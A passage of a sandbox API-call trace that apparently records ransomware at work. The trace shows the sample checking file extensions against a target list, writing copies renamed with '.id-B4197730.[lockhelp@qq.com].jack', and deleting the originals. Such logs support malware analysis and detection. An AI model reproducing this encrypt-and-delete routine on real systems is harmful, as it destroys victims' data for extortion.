(hObject=0x3f0) returned 1 [0196.666] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.667] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 1 [0196.667] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.667] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.667] lstrlenW (lpString=".doc") returned 4 [0196.667] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.667] lstrlenW (lpString=".docx") returned 5 [0196.667] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.667] lstrlenW (lpString=".pdf") returned 4 [0196.667] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.667] lstrlenW (lpString=".xls") returned 4 [0196.667] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.667] lstrlenW (lpString=".xlsx") returned 5 [0196.667] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.667] lstrlenW (lpString=".ppt") returned 4 [0196.667] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.667] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.667] lstrlenW (lpString=".zip") returned 4 [0196.668] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.668] lstrlenW (lpString=".rar") returned 4 [0196.668] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString=".bz2") returned 4 [0196.668] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString=".7z") returned 3 [0196.668] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.668] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.668] lstrlenW (lpString=".dbf") returned 4 [0196.668] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.668] lstrlenW (lpString=".1cd") returned 4 [0196.668] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.668] lstrlenW (lpString=".jpg") returned 4 [0196.668] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.668] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0196.668] lstrlenW (lpString=".doc") returned 4 [0196.668] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString=".docx") returned 5 [0196.668] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.668] lstrlenW (lpString=".pdf") returned 4 [0196.668] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.668] lstrlenW (lpString=".xls") returned 4 [0197.075] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.076] lstrlenW (lpString=".xlsx") returned 5 [0197.076] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.076] lstrlenW (lpString=".ppt") returned 4 [0197.076] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0197.076] lstrlenW (lpString=".zip") returned 4 [0197.076] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.076] lstrlenW (lpString=".rar") returned 4 [0197.076] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.076] lstrlenW (lpString=".bz2") returned 4 [0197.076] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.076] lstrlenW (lpString=".7z") returned 3 [0197.076] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0197.076] lstrlenW (lpString=".dbf") returned 4 [0197.076] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0197.076] lstrlenW (lpString=".1cd") returned 4 [0197.076] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.076] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0197.076] lstrlenW (lpString=".jpg") returned 4 [0197.076] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.076] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.077] lstrlenW (lpString="eula.rtf") returned 8 [0197.077] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.077] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3526) returned 1 [0197.077] CloseHandle (hObject=0x3f4) returned 1 [0197.077] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 0x80 [0197.077] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.077] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.077] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.077] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.078] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.607] GetLastError () returned 0x0 [0197.607] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xdc6, lpOverlapped=0x0) returned 1 [0197.608] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xdd0, lpOverlapped=0x0) returned 1 [0197.610] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.610] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.610] SetEndOfFile (hFile=0x3d4) returned 1 [0197.610] CloseHandle (hObject=0x3d4) returned 1 [0197.611] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.611] SetEndOfFile (hFile=0x3f4) returned 1 [0197.612] CloseHandle (hObject=0x3f4) returned 1 [0197.612] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.612] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 1 [0197.613] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.613] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.613] lstrlenW (lpString=".doc") returned 4 [0197.613] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.613] lstrlenW (lpString=".docx") returned 5 [0197.613] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.613] lstrlenW (lpString=".pdf") returned 4 [0197.613] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.613] lstrlenW (lpString=".xls") returned 4 [0197.613] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.613] lstrlenW (lpString=".xlsx") returned 5 [0197.613] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.613] lstrlenW (lpString=".ppt") returned 4 [0197.613] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.613] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.613] lstrlenW (lpString=".zip") returned 4 [0197.613] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.613] lstrlenW (lpString=".rar") returned 4 [0197.613] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.613] lstrlenW (lpString=".bz2") returned 4 [0197.613] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.613] lstrlenW (lpString=".7z") returned 3 [0197.613] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.613] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.613] lstrlenW (lpString=".dbf") returned 4 [0197.614] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.614] lstrlenW (lpString=".1cd") returned 4 [0197.614] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.614] lstrlenW (lpString=".jpg") returned 4 [0197.614] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.614] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.614] lstrlenW (lpString=".doc") returned 4 [0197.614] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString=".docx") returned 5 [0197.614] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.614] lstrlenW (lpString=".pdf") returned 4 [0197.614] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString=".xls") returned 4 [0197.614] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.614] lstrlenW (lpString=".xlsx") returned 5 [0197.614] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.614] lstrlenW (lpString=".ppt") returned 4 [0197.614] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.614] lstrlenW (lpString=".zip") returned 4 [0197.614] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.614] lstrlenW (lpString=".rar") returned 4 [0197.614] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.614] lstrlenW (lpString=".bz2") returned 4 [0197.614] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.615] lstrlenW (lpString=".7z") returned 3 [0197.615] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.615] lstrlenW (lpString=".dbf") returned 4 [0197.615] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.615] lstrlenW (lpString=".1cd") returned 4 [0197.615] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0197.615] lstrlenW (lpString=".jpg") returned 4 [0197.615] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.615] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.615] lstrlenW (lpString="eula.rtf") returned 8 [0197.615] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.615] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3046) returned 1 [0197.615] CloseHandle (hObject=0x3f4) returned 1 [0197.616] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 0x80 [0197.616] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.616] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.616] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.616] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.616] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.616] GetLastError () returned 0x0 [0197.616] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xbe6, lpOverlapped=0x0) returned 1 [0197.618] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xbf0, lpOverlapped=0x0) returned 1 [0197.620] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.620] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.620] SetEndOfFile (hFile=0x3d4) returned 1 [0197.620] CloseHandle (hObject=0x3d4) returned 1 [0197.621] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.621] SetEndOfFile (hFile=0x3f4) returned 1 [0197.622] CloseHandle (hObject=0x3f4) returned 1 [0197.622] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.622] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 1 [0197.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.623] lstrlenW (lpString=".doc") returned 4 [0197.623] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.623] lstrlenW (lpString=".docx") returned 5 [0197.623] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.623] lstrlenW (lpString=".pdf") returned 4 [0197.623] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.623] lstrlenW (lpString=".xls") returned 4 [0197.623] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.623] lstrlenW (lpString=".xlsx") returned 5 [0197.623] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.623] lstrlenW (lpString=".ppt") returned 4 [0197.623] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.623] lstrlenW (lpString=".zip") returned 4 [0197.623] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.623] lstrlenW (lpString=".rar") returned 4 [0197.623] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.623] lstrlenW (lpString=".bz2") returned 4 [0197.623] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.623] lstrlenW (lpString=".7z") returned 3 [0197.624] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.624] lstrlenW (lpString=".dbf") returned 4 [0197.624] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.624] lstrlenW (lpString=".1cd") returned 4 [0197.624] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.624] lstrlenW (lpString=".jpg") returned 4 [0197.624] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.624] lstrlenW (lpString=".doc") returned 4 [0197.624] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.624] lstrlenW (lpString=".docx") returned 5 [0197.624] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.624] lstrlenW (lpString=".pdf") returned 4 [0197.624] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.624] lstrlenW (lpString=".xls") returned 4 [0197.624] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.624] lstrlenW (lpString=".xlsx") returned 5 [0197.624] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.624] lstrlenW (lpString=".ppt") returned 4 [0197.624] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.624] lstrlenW (lpString=".zip") returned 4 [0197.624] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.624] lstrlenW (lpString=".rar") returned 4 [0197.625] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.625] lstrlenW (lpString=".bz2") returned 4 [0197.625] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.625] lstrlenW (lpString=".7z") returned 3 [0197.625] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.625] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.625] lstrlenW (lpString=".dbf") returned 4 [0197.625] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.625] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.625] lstrlenW (lpString=".1cd") returned 4 [0197.625] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.625] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0197.625] lstrlenW (lpString=".jpg") returned 4 [0197.625] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.625] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.625] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.625] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.625] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=79296) returned 1 [0197.626] CloseHandle (hObject=0x3f4) returned 1 [0197.626] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 0x80 [0197.626] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.626] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.626] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.626] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.626] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.626] GetLastError () returned 0x0 [0197.626] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x135c0, lpOverlapped=0x0) returned 1 [0197.735] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x135d0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x135d0, lpOverlapped=0x0) returned 1 [0197.737] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.738] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.738] SetEndOfFile (hFile=0x3d4) returned 1 [0197.738] CloseHandle (hObject=0x3d4) returned 1 [0197.741] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.741] SetEndOfFile (hFile=0x3f4) returned 1 [0197.742] CloseHandle (hObject=0x3f4) returned 1 [0197.743] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.743] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 1 [0197.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.743] lstrlenW (lpString=".doc") returned 4 [0197.743] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.743] lstrlenW (lpString=".docx") returned 5 [0197.743] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.743] lstrlenW (lpString=".pdf") returned 4 [0197.743] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.744] lstrlenW (lpString=".xls") returned 4 [0197.744] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.744] lstrlenW (lpString=".xlsx") returned 5 [0197.771] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.771] lstrlenW (lpString=".ppt") returned 4 [0197.771] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.771] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.771] lstrlenW (lpString=".zip") returned 4 [0197.771] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.771] lstrlenW (lpString=".rar") returned 4 [0197.772] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString=".bz2") returned 4 [0197.772] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString=".7z") returned 3 [0197.772] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.772] lstrlenW (lpString=".dbf") returned 4 [0197.772] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.772] lstrlenW (lpString=".1cd") returned 4 [0197.772] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.772] lstrlenW (lpString=".jpg") returned 4 [0197.772] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.772] lstrlenW (lpString=".doc") returned 4 [0197.772] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.772] lstrlenW 